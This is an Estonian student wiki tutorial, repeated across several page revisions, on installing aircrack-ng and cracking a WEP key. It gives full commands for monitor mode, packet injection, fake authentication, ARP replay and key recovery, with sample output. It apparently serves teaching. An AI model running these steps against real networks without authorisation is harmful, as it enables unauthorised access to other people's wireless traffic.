1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:15:46Z

Ktragel: /* Versioonide ajalugu */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==
 

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
<tr>
<td> x </td>
<td> x </td>
</tr>
<tr>
<td> x </td>
<td> x </td>
</tr>
<tr>
</table>

Aircrack

2015-05-25T19:15:21Z

Ktragel: /* Autor(id) */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==
 

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
</table>

Aircrack

2015-05-25T19:14:56Z

Ktragel:

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
